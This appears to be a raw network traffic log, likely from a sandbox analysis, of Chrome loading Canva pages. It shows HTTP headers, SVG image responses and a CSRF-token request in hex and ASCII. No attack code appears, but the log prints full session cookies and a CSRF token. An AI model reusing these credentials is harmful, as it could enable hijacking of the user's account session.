                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1369INData Raw: 74 2c 74 68 69 73 2e 4e 65 2c 22 64 61 74 65 74 69 6d 65 22 29 7d 59 28 29 7b 63 6f 6e 73 74 20 74 3d 7b 7d 3b 72 65 74 75 72 6e 20 74 5b 6e 2e 74 74 2e 68 74 5d 3d 74 68 69 73 2e 69 64 2c 74 5b 6e 2e 74 74 2e 6c 65 5d 3d 74 68 69 73 2e 65 6e 61 62 6c 65 64 2c 74 5b 6e 2e 74 74 2e 70 65 5d 3d 74 68 69 73 2e 70 72 6f 70 65 72 74 69 65 73 2c 74 5b 6e 2e 74 74 2e 46 65 5d 3d 74 68 69 73 2e 74 72 61 63 6b 69 6e 67 53 74 72 69 6e 67 2c 74 7d 50 65 28 74 29 7b 73 2e 5a 2e 69 6e 66 6f 28 60 50 72 6f 70 65 72 74 79 20 69 73 20 6e 6f 74 20 6f 66 20 74 79 70 65 20 24 7b 74 7d 2e 60 29 7d 79 65 28 74 29 7b 73 2e 5a 2e 69 6e 66 6f 28 60 24 7b 74 7d 20 6e 6f 74 20 66 6f 75 6e 64 20 69 6e 20 66 65 61 74 75 72 65 20 66 6c 61 67 20 70 72 6f 70 65 72 74 69 65 73 2e 60 29
                                                                                                                                                                                                                                                                    Data Ascii: t,this.Ne,"datetime")}Y(){const t={};return t[n.tt.ht]=this.id,t[n.tt.le]=this.enabled,t[n.tt.pe]=this.properties,t[n.tt.Fe]=this.trackingString,t}Pe(t){s.Z.info(`Property is not of type ${t}.`)}ye(t){s.Z.info(`${t} not found in feature flag properties.`)


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    105192.168.2.1249833104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC639OUTGET /web/images/8777e8ed572c4159d71b08cca2972b15.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1189INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:49 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 1525
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e59514979a58c57-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 1225326
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "8777e8ed572c4159d71b08cca2972b15"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:35 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Wed, 21 Aug 2024 01:04:39 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Fri, 22 Aug 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: uLWvWvQBIB3tPnM1a6GWrNOzpcwL324zaNAEpVGXnRy9cwdoCOPKs3Vx/7s8fI02BxnNjJwx+CQ=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: EGX1EGCJMZB9EHBE
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: jtMhEzsaRqm0hVKkxFqRP4cFVGMnDvLS
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 36 45 47 74 43 71 6b 63 49 45 52 58 44 62 48 71 63 74 56 6d 74 41 55 6e 32 61 38 74 47 42 25 32 42 5a 35 6e 73 4f 36 43 4b 70 64 30 4a 63 61 4f 38 69 67 76 30 6c 6c 4c 72 4f 48 4b 41 58 68 25 32 46 74 42 59 42 71 70 67 71 33 42 52 33 4e 45 75 33 55 6a 39 37 6b 74 32 31 72 30 41 76 47 49 4b 54 68 72 33 74 6e 49 62 45 37 4c 57 62 57 45 79 72 36 78 67 7a 55 73 35 63 36 50 62 62 78 25 32 42 36 4d 6f 39 64 78 73 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6EGtCqkcIERXDbHqctVmtAUn2a8tGB%2BZ5nsO6CKpd0JcaO8igv0llLrOHKAXh%2FtBYBqpgq3BR3NEu3Uj97kt21r0AvGIKThr3tnIbE7LWbWEyr6xgzUs5c6Pbbx%2B6Mo9dxs%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1199INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 36 20 33 36 22 3e 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 46 46 43 42 34 43 22 20 63 78 3d 22 31 38 22 20 63 79 3d 22 31 37 2e 30 31 38 22 20 72 3d 22 31 37 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 36 35 34 37 31 42 22 20 64 3d 22 4d 31 34 2e 35 32 34 20 32 31 2e 30 33 36 61 2e 39 31 34 2e 39 31 34 20 30 20 30 20 31 2d 2e 33 31 32 2d 2e 34 36 34 2e 37 39 39 2e 37 39 39 20 30 20 30 20 31 20 2e 35 39 2d 31 2e 30 32 31 63 34 2e 35 32 38 2d 31 2e 30 32 31 20 37 2e 35 37 37 20 31 2e 33 36 33 20 37 2e 37 30 36 20 31 2e 34 36 35 2e 33 38 34 2e 33 30 36 2e 34 35 39 2e 38 34 35 2e 31 37 33 20
                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><circle fill="#FFCB4C" cx="18" cy="17.018" r="17"/><path fill="#65471B" d="M14.524 21.036a.914.914 0 0 1-.312-.464.799.799 0 0 1 .59-1.021c4.528-1.021 7.577 1.363 7.706 1.465.384.306.459.845.173
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC326INData Raw: 38 34 33 2e 30 33 34 2e 34 33 33 2e 32 33 31 2e 36 30 38 2e 37 34 37 2e 33 39 31 20 31 2e 31 35 34 2d 2e 32 31 36 2e 34 30 35 2d 2e 37 34 2e 35 34 36 2d 31 2e 31 37 33 2e 33 31 38 2d 2e 31 32 33 2d 2e 30 36 33 2d 32 2e 38 33 32 2d 31 2e 34 33 32 2d 36 2e 32 37 38 2e 30 34 37 61 2e 39 31 35 2e 39 31 35 20 30 20 30 20 31 2d 2e 37 38 35 2d 2e 30 34 32 7a 6d 31 32 2e 31 33 35 20 33 2e 37 35 61 2e 39 32 34 2e 39 32 34 20 30 20 30 20 31 2d 2e 33 36 32 2d 2e 34 32 34 2e 38 2e 38 20 30 20 30 20 31 20 2e 34 36 38 2d 31 2e 30 38 34 63 34 2e 33 38 31 2d 31 2e 35 33 36 20 37 2e 36 38 35 2e 34 38 20 37 2e 38 32 33 2e 35 36 37 2e 34 31 35 2e 32 36 2e 35 35 35 2e 37 38 37 2e 33 31 32 20 31 2e 31 37 38 2d 2e 32 34 32 2e 33 39 2d 2e 37 37 36 2e 34 39 35 2d 31 2e 31 39 31
                                                                                                                                                                                                                                                                    Data Ascii: 843.034.433.231.608.747.391 1.154-.216.405-.74.546-1.173.318-.123-.063-2.832-1.432-6.278.047a.915.915 0 0 1-.785-.042zm12.135 3.75a.924.924 0 0 1-.362-.424.8.8 0 0 1 .468-1.084c4.381-1.536 7.685.48 7.823.567.415.26.555.787.312 1.178-.242.39-.776.495-1.191


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    106192.168.2.1249834104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC639OUTGET /web/images/aba10b640f15bb01b8e5f0b804eefc7f.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1188INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:49 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 1404
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951499a470f3f-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 879125
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "aba10b640f15bb01b8e5f0b804eefc7f"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:35 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Tue, 10 Sep 2024 12:27:33 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Thu, 11 Sep 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
                                                                                                                                                                                                                                                                    x-amz-id-2: UkrsL4xawzULLeDr+NETBBdWKqUuCZB4cLGnA6j/rIq3UuAoWPMEeDNUrM2qH+d4c+NIdWdxriY=
                                                                                                                                                                                                                                                                    x-amz-replication-status: COMPLETED
                                                                                                                                                                                                                                                                    x-amz-request-id: Q20KJYH02AJXT42Y
                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                    x-amz-version-id: En5JsX.mH8GMn3opGhvkbwOFKb7w0bxF
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC350INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 39 39 6a 42 6c 6f 39 44 58 6b 36 37 6c 48 6e 57 75 67 77 65 39 25 32 42 30 62 4c 74 49 39 77 61 68 76 56 46 68 59 68 6a 35 47 4c 31 6c 53 6e 51 65 4b 68 39 4e 6d 63 53 4e 6a 4b 46 68 77 51 78 78 79 52 5a 58 34 63 52 67 6c 77 33 42 30 50 56 42 52 43 73 47 68 53 6e 49 54 67 64 36 38 76 76 67 65 34 6d 73 51 4d 77 72 6c 53 63 25 32 46 74 4d 47 61 51 4f 79 4b 5a 54 75 75 6a 6e 43 43 73 25 32 42 47 41 47 4c 42 63 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30
                                                                                                                                                                                                                                                                    Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=99jBlo9DXk67lHnWugwe9%2B0bLtI9wahvVFhYhj5GL1lSnQeKh9NmcSNjKFhwQxxyRZX4cRglw3B0PVBRCsGhSnITgd68vvge4msQMwrlSc%2FtMGaQOyKZTuujnCCs%2BGAGLBc%3D"}],"group":"cf-nel","max_age":604800
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1200INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 33 36 20 33 36 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 46 46 44 42 35 45 22 20 64 3d 22 4d 33 34 2e 39 35 36 20 31 37 2e 39 31 36 63 30 2d 2e 35 30 33 2d 2e 31 32 2d 2e 39 37 35 2d 2e 33 32 31 2d 31 2e 34 30 34 2d 31 2e 33 34 31 2d 34 2e 33 32 36 2d 37 2e 36 31 39 2d 34 2e 30 31 2d 31 36 2e 35 34 39 2d 34 2e 32 32 31 2d 31 2e 34 39 33 2d 2e 30 33 35 2d 2e 36 33 39 2d 31 2e 37 39 38 2d 2e 31 31 35 2d 35 2e 36 36 38 2e 33 34 31 2d 32 2e 35 31 37 2d 31 2e 32 38 32 2d 36 2e 33 38 32 2d 34 2e 30 31 2d 36 2e 33 38 32 2d 34 2e 34 39 38 20 30 2d 2e 31 37 31 20 33 2e 35 34 38 2d 34 2e 31 34 38 20 31 32
                                                                                                                                                                                                                                                                    Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 36 36"><path fill="#FFDB5E" d="M34.956 17.916c0-.503-.12-.975-.321-1.404-1.341-4.326-7.619-4.01-16.549-4.221-1.493-.035-.639-1.798-.115-5.668.341-2.517-1.282-6.382-4.01-6.382-4.498 0-.171 3.548-4.148 12
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC204INData Raw: 31 20 30 2d 31 2e 35 30 34 2d 2e 38 39 34 20 31 2e 35 37 32 20 31 2e 35 37 32 20 30 20 30 20 31 2d 31 2e 33 36 33 2e 37 37 37 68 2d 37 2e 30 36 33 61 31 2e 35 38 35 20 31 2e 35 38 35 20 30 20 30 20 31 20 30 2d 33 2e 31 36 37 68 38 2e 30 39 31 61 33 2e 33 35 20 33 2e 33 35 20 30 20 30 20 30 20 32 2e 38 36 37 2d 31 2e 36 33 32 2e 38 37 35 2e 38 37 35 20 30 20 30 20 30 2d 31 2e 35 30 34 2d 2e 38 39 34 20 31 2e 35 37 33 20 31 2e 35 37 33 20 30 20 30 20 31 2d 31 2e 33 36 33 2e 37 37 36 48 32 33 2e 30 32 61 31 2e 35 38 35 20 31 2e 35 38 35 20 30 20 30 20 31 20 30 2d 33 2e 31 36 37 7a 22 2f 3e 3c 2f 73 76 67 3e
                                                                                                                                                                                                                                                                    Data Ascii: 1 0-1.504-.894 1.572 1.572 0 0 1-1.363.777h-7.063a1.585 1.585 0 0 1 0-3.167h8.091a3.35 3.35 0 0 0 2.867-1.632.875.875 0 0 0-1.504-.894 1.573 1.573 0 0 1-1.363.776H23.02a1.585 1.585 0 0 1 0-3.167z"/></svg>


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    107192.168.2.1249837104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1242OUTGET /_ajax/csrf3/ae HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1064INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:49 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951499fe842bd-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                                    x-request-id: 8e5951499fe842bd
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ecoJip7rnfSpa8vKeB9Ohnr6kWtCHiZSBlpovWZ8j28kBlIcEFdm6sSdmSYWEWVG%2BBNXCXAilEFvyeH2EaxH0aa%2FTPW9XP7AstO%2F6JXNNHaUAzoOyIgSC9cwJfgwVYk%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC143INData Raw: 38 39 0d 0a 27 22 5d 29 7d 77 68 69 6c 65 28 31 29 3b 3c 2f 78 3e 2f 2f 7b 22 41 22 3a 22 49 6b 30 77 6d 6e 4a 52 6d 2d 77 39 68 66 41 61 4e 7a 6a 46 77 61 78 4e 71 62 62 6f 30 54 6f 49 53 4e 62 49 42 5a 4b 30 43 54 74 58 62 46 67 78 46 58 41 52 36 6d 75 46 71 49 46 54 6a 38 4a 66 33 4f 63 61 4e 52 7a 46 74 56 41 79 79 71 30 6f 4e 4c 41 77 79 79 4e 59 77 78 73 22 2c 22 42 22 3a 31 37 33 32 31 32 32 31 30 39 37 31 37 7d 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 89'"])}while(1);</x>//{"A":"Ik0wmnJRm-w9hfAaNzjFwaxNqbbo0ToISNbIBZK0CTtXbFgxFXAR6muFqIFTj8Jf3OcaNRzFtVAyyq0oNLAwyyNYwxs","B":1732122109717}
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    108192.168.2.124983835.190.80.1443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC526OUTOPTIONS /report/v4?s=cieGLFt6H7sZRhPwYowh1Q7hyn5s1wR%2FHkRpNjolTj8PPDVJjl4ZM3SUWQexkojioKzqEqqofInGo1xBKIaAKigDKoJKfTvrHx5r2nk9rS1vU0x70fx4fs8CH1AE5V4%3D HTTP/1.1
                                                                                                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Access-Control-Request-Method: POST
                                                                                                                                                                                                                                                                    Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    access-control-max-age: 86400
                                                                                                                                                                                                                                                                    access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                                                                                    access-control-allow-origin: *
                                                                                                                                                                                                                                                                    access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                                                    date: Wed, 20 Nov 2024 15:01:49 GMT
                                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    109192.168.2.1249835104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC639OUTGET /web/images/e5c5a4d109aeb5234e4405032dfd4800.svg HTTP/1.1
                                                                                                                                                                                                                                                                    Host: static.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000
                                                                                                                                                                                                                                                                    2024-11-20 15:01:49 UTC1187INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:49 GMT
                                                                                                                                                                                                                                                                    Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                    Content-Length: 470
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e595149c9c40ca5-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                    Age: 809387
                                                                                                                                                                                                                                                                    Cache-Control: public, max-age=31556926
                                                                                                                                                                                                                                                                    ETag: "e5c5a4d109aeb5234e4405032dfd4800"
                                                                                                                                                                                                                                                                    Expires: Thu, 20 Nov 2025 20:50:35 GMT
                                                                                                                                                                                                                                                                    Last-Modified: Fri, 13 Sep 2024 01:54:33 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Accept-Encoding, Origin
                                                                                                                                                                                                                                                                    content-security-policy: script-src 'none'; frame-src 'none'; object-src 'none'; default-src 'none'; style-src 'unsafe-inline'; img-src 'self'; media-src 'self'; form-action 'none'; base-uri 'none'; report-uri https://csp.canva.com/_cspreport?app=s3_static
                                                                                                                                                                                                                                                                    timing-allow-origin: https://www.canva.com
                                                                                                                                                                                                                                                                    x-amz-expiration: expiry-date="Sun, 14 Sep 2025 00:00:00 GMT", rule-id="Cleanup objects in web/ older than 1 year"
